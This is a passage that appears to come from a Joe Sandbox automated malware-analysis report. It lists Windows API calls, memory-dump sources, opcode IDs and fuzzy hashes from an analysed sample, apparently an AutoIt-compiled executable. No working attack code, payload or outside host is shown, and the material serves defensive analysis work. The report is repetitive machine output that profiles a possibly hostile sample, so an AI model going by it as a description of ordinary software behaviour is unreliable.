                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 0435a3707f0ab58d2f0c1f53ab119aba0806b11d1c7bc3fb265731d548715422
                                                                    • Instruction ID: 74faa84caffba69d58b990fc6f3772bf318a69a515cbc351444eae6946b71931
                                                                    • Opcode Fuzzy Hash: 0435a3707f0ab58d2f0c1f53ab119aba0806b11d1c7bc3fb265731d548715422
                                                                    • Instruction Fuzzy Hash: 66019270244708BEF3211E68CC8AF763BDDAB01B68F14831ABBE59A2D0C6B91C459B54
                                                                    APIs
                                                                      • Part of subcall function 00FF571C: __FF_MSGBANNER.LIBCMT ref: 00FF5733
                                                                      • Part of subcall function 00FF571C: __NMSG_WRITE.LIBCMT ref: 00FF573A
                                                                      • Part of subcall function 00FF571C: RtlAllocateHeap.NTDLL(01500000,00000000,00000001,00000000,?,?,?,00FF0DD3,?), ref: 00FF575F
                                                                    • std::exception::exception.LIBCMT ref: 00FF0DEC
                                                                    • __CxxThrowException@8.LIBCMT ref: 00FF0E01
                                                                      • Part of subcall function 00FF859B: RaiseException.KERNEL32(?,?,?,01089E78,00000000,?,?,?,?,00FF0E06,?,01089E78,?,00000001), ref: 00FF85F0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 3902256705-0
                                                                    • Opcode ID: 5929a76e6a1cfad0cbd3514793be3f0ae7c3b37f541b8c8d50e123126ee7009d
                                                                    • Instruction ID: 3e3302a01b659197d341cbd86be375ff473766beb5c163f85c5515de5d8623e6
                                                                    • Opcode Fuzzy Hash: 5929a76e6a1cfad0cbd3514793be3f0ae7c3b37f541b8c8d50e123126ee7009d
                                                                    • Instruction Fuzzy Hash: F1F0A432D0021E66CB14FA94EC019FE7BAC9F113A1F104469FB44961A2EF749A81A6D1
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __lock_file_memset
                                                                    • String ID:
                                                                    • API String ID: 26237723-0
                                                                    • Opcode ID: 9777a9315467a5a40f9bc223e5e8bf983b13479f3f8c6114b58c50178a7926c4
                                                                    • Instruction ID: e49c649dd819bcd0cb70894708a149bcdef2c7acd26b2c4e1a4587dda05b5e8e
                                                                    • Opcode Fuzzy Hash: 9777a9315467a5a40f9bc223e5e8bf983b13479f3f8c6114b58c50178a7926c4
                                                                    • Instruction Fuzzy Hash: AA01F771C00A0CEBCF22AF648C024BE7B61AF90B61F404115FB249B271DB798A12FF91
                                                                    APIs
                                                                      • Part of subcall function 00FF8B28: __getptd_noexit.LIBCMT ref: 00FF8B28
                                                                    • __lock_file.LIBCMT ref: 00FF53EB
                                                                      • Part of subcall function 00FF6C11: __lock.LIBCMT ref: 00FF6C34
                                                                    • __fclose_nolock.LIBCMT ref: 00FF53F6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                    • String ID:
                                                                    • API String ID: 2800547568-0
                                                                    • Opcode ID: 285f36b519f068d5aef62047a84ea3311c76d511bf86f8c0bedbce0206f91b90
                                                                    • Instruction ID: 57c093b3f3e0d56ae4c1a1f5cb200a4ddafe3146c0ce4cb0a750fd3cc957dba0
                                                                    • Opcode Fuzzy Hash: 285f36b519f068d5aef62047a84ea3311c76d511bf86f8c0bedbce0206f91b90
                                                                    • Instruction Fuzzy Hash: 54F09631D00A1C9ADB21AB799C017BD76A16F41BB5F208109A764AB1F1DFFC8942BB51
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,00FD542F,?,?,?,?,?), ref: 00FD807A
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,00FD542F,?,?,?,?,?), ref: 00FD80AD
                                                                      • Part of subcall function 00FD774D: _memmove.LIBCMT ref: 00FD7789
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$_memmove
                                                                    • String ID:
                                                                    • API String ID: 3033907384-0
                                                                    • Opcode ID: 576c609856b98e6a0d4b7e8bfdf55a41e4401658d302d47bada62400bd185a59
                                                                    • Instruction ID: 019f41ba89a00867281349cb375b69b1bb8c219ce175ca50407c4f6f684ef2b9
                                                                    • Opcode Fuzzy Hash: 576c609856b98e6a0d4b7e8bfdf55a41e4401658d302d47bada62400bd185a59
                                                                    • Instruction Fuzzy Hash: 5A01A2712012047FEB246A21DC4AF7B3B6EEF85360F14802AFA05CE291DE659800D661
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: de56835962733d50a9d3357f821c916755190b2de2af136395288b47b82b31f0
                                                                    • Instruction ID: fde6006b532c958d731ca4b525312ae307c8ca834ebd2624b1e97cc36a289393
                                                                    • Opcode Fuzzy Hash: de56835962733d50a9d3357f821c916755190b2de2af136395288b47b82b31f0
                                                                    • Instruction Fuzzy Hash: C961AA71A0020A9FCB10DF64C880EAAB7F6EF05314F18846AE947DB391DBB5ED44EB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c162654697b563cf2ec5cbaedb64337663e0404866b537e2e453a1b691ea56ca
                                                                    • Instruction ID: 06357f4792604f713953c7b1486672bd042bfc7fd027261476e4a1c47b16e6da
                                                                    • Opcode Fuzzy Hash: c162654697b563cf2ec5cbaedb64337663e0404866b537e2e453a1b691ea56ca
                                                                    • Instruction Fuzzy Hash: 7C51D4316002049FCF14EF68CC91FAE77AAAF85310F1840A9F9469B396DB39ED00EB41
                                                                    APIs
                                                                      • Part of subcall function 01581A58: GetFileAttributesW.KERNELBASE(?), ref: 01581A63
                                                                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 01582356
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2063593989.0000000001581000.00000040.00000020.00020000.00000000.sdmp, Offset: 01581000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1581000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesCreateDirectoryFile
                                                                    • String ID:
                                                                    • API String ID: 3401506121-0
                                                                    APIs
                                                                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00FD5B96
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ClearVariant
                                                                    • String ID:
                                                                    • API String ID: 1473721057-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID:
                                                                    • API String ID: 4104443479-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscmp
                                                                    • String ID:
                                                                    • API String ID: 856254489-0
                                                                    APIs
                                                                      • Part of subcall function 00FD4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00FD4BEF
                                                                      • Part of subcall function 00FF525B: __wfsopen.LIBCMT ref: 00FF5266
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FD4E0F
                                                                      • Part of subcall function 00FD4B6A: FreeLibrary.KERNEL32(00000000), ref: 00FD4BA4
                                                                      • Part of subcall function 00FD4C70: _memmove.LIBCMT ref: 00FD4CBA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                                    • String ID:
                                                                    • API String ID: 1396898556-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ClearVariant
                                                                    • String ID:
                                                                    • API String ID: 1473721057-0
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00FD56A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00FD5C16
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID:
                                                                    • API String ID: 4104443479-0
                                                                    APIs
                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FF07B0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: LongNamePath
                                                                    • String ID:
                                                                    • API String ID: 82841172-0
                                                                    APIs
                                                                    • __lock_file.LIBCMT ref: 00FF48A6
                                                                      • Part of subcall function 00FF8B28: __getptd_noexit.LIBCMT ref: 00FF8B28
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __getptd_noexit__lock_file
                                                                    • String ID:
                                                                    • API String ID: 2597487223-0
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?,?,010952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FD4E7E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 0f8e87b8ab2299ea487051b0b5086a159bc90f10ccf729fd88924486b589b63d
                                                                    • Instruction ID: e38b6ea64af4bc267306c7bc008bf28744d11dc9cb8b9ab2436b1ce2ad52d7ce
                                                                    • Opcode Fuzzy Hash: 0f8e87b8ab2299ea487051b0b5086a159bc90f10ccf729fd88924486b589b63d
                                                                    • Instruction Fuzzy Hash: 35F01C71501711DFCB349F64D494812B7E2BF14335318896EE2D682710C776A840EB40
                                                                    APIs
                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FF07B0
                                                                      • Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: LongNamePath_memmove
                                                                    • String ID:
                                                                    • API String ID: 2514874351-0
                                                                    • Opcode ID: e12b5f801011d1cead23d71057e0f372f75a47cb83042841e421ee0af191b514
                                                                    • Instruction ID: b6b658512db3a0eaf43509d971d27a579c7d901ec2568a935423a8e5f45315c7
                                                                    • Opcode Fuzzy Hash: e12b5f801011d1cead23d71057e0f372f75a47cb83042841e421ee0af191b514
                                                                    • Instruction Fuzzy Hash: F2E0867690422957C721A5689C05FEA77DDDBC86A0F0441B6FD4CD7248D9659C808690
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock
                                                                    • String ID:
                                                                    • API String ID: 2638373210-0
                                                                    • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                    • Instruction ID: 9ce9ad7dfa3a84a66e62a45ccc5d1deb4cc6ac72920d7388cb034aba32f04b60
                                                                    • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                    • Instruction Fuzzy Hash: 93E092B0104B045FD7398A28D800BA377E5AB05305F04099DF2EA83242EB6278458759
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 01581A63
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2063593989.0000000001581000.00000040.00000020.00020000.00000000.sdmp, Offset: 01581000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1581000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                    • Instruction ID: e8f48401111c0767818ee1cac5714d65840ab78bb3ec9d911671def70fec7fb7
                                                                    • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                    • Instruction Fuzzy Hash: 20E08C30905608EFDB10EBA8C945AEDB3E8BB04320F004A55A916EB280D9708A41D7D4
                                                                    APIs
                                                                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0100DD42,?,?,00000000), ref: 00FD5C5F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
